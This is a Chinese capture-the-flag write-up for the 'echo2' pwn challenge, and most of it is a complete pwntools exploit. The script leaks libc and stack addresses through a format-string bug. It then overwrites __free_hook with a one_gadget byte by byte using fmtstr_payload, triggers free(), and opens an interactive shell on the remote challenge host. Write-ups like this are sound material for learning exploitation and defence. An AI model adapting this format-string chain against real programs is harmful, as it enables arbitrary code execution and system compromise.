前置知识
- 格式化字符串
- free_hook
利用
整体思路
可以无限次利用的格式化字符串漏洞，白给。
只需要注意一点：格式化字符串漏洞处的 payload 长度有限，只能输入 0x20 长度的 payload。
这里偷懒用了 pwntools 自带的 fmtstr_payload（每次只写一个字节），因此多利用了几次，其实自己写 payload 比较好。
exp
from pwn import *
from LibcSearcher import *
# Target binary and the libc build the offsets below were taken from.
filename = './echo2'
context(log_level='debug', arch='amd64')

# 0 -> talk to the remote instance; 1 -> spawn ./echo2 locally (needed for debug()).
local = 0

# leak_info() appends one line per leaked value here so debug() can replay them.
all_logs = []

elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')

sh = process(filename) if local else remote('node4.buuoj.cn', 28603)
def debug():
    """Re-print every recorded leak, attach gdb to the target and pause.

    Only meaningful with ``local = 1``: pidof() looks up a local process.
    """
    # Replay the leaks first so they sit right next to the gdb session output.
    for entry in all_logs:
        success(entry)
    gdb.attach(util.proc.pidof(sh)[0])
    pause()
def leak_info(name, addr):
    """Log ``name => 0x...`` via success() and remember it in all_logs for debug()."""
    line = f'{name} => {hex(addr)}'
    all_logs.append(line)
    success(line)
choice_words = 'Choice: '
def input_name(name):
    """Answer the name prompt; non-string names are stringified first."""
    prompt = "hey, what's your name? : "
    sh.sendlineafter(prompt, str(name))
def fmt(content):
    """Pick menu option 2 and send *content* (newline-terminated) as the format-string input."""
    option = '2'
    sh.sendlineafter('> ', option)
    sh.recvline()  # consume the line printed after the choice
    sh.sendline(content)
def uaf(content):
    """Pick menu option 3 and send *content* raw, without a trailing newline."""
    option = '3'
    sh.sendlineafter('> ', option)
    sh.recvline()  # consume the line printed after the choice
    sh.send(content)
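# ---------------------------------------------------------------------------
# Exploit flow for ./echo2 (libc 2.23-0ubuntu11, the build loaded above):
#   1. one format-string round leaks a libc address and a stack address;
#   2. further rounds overwrite __free_hook with a one_gadget, one byte each,
#      because the format-string input is capped at 0x20 bytes;
#   3. a free() then dispatches through the hook.
# On the binary side the root cause is the user-controlled format argument;
# printing the buffer as "%s" data instead of as the format removes the chain.
# ---------------------------------------------------------------------------
input_name('123')

# Step 1: two positional %p reads.  recv(14) assumes each pointer prints as
# "0x" + 12 hex digits; a shorter pointer would desynchronise the parsing.
payload = '%19$p%9$p'
fmt(payload)
libc_leak = int(sh.recv(14).decode(), 16)
leak_info('libc_leak', libc_leak)
stack_leak = int(sh.recv(14).decode(), 16)
leak_info('stack_leak', stack_leak)

# Offsets are specific to this binary/libc build (presumably measured with
# debug()); they will not carry over to another build.
return_addr = stack_leak - 0x38
libc.address = libc_leak - 0x20830
leak_info('libc.address', libc.address)
leak_info('return_address', return_addr)

# Candidate one_gadget offsets for this libc; index 1 is the one the script uses.
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
gadget = libc.address + one_gadget[1]
leak_info('gadget', gadget)

# Step 2: one byte of the gadget address per round (write_size='byte').
# Only the low 7 bytes are written; the top byte of a user-space address is
# zero and the hook slot is assumed to be zero there already.
free_hook = libc.sym['__free_hook']
for byte_index in range(7):
    byte_value = (gadget >> (8 * byte_index)) & 0xff
    payload = fmtstr_payload(6, {free_hook + byte_index: byte_value}, write_size='byte')
    print(len(payload))  # shown so an over-long payload is noticed before it is sent
    fmt(payload)

# Step 3: option 3 (the path the author labels uaf) presumably frees the
# chunk, which now goes through the overwritten __free_hook.
uaf('123')
# debug()
sh.interactive()
# debug()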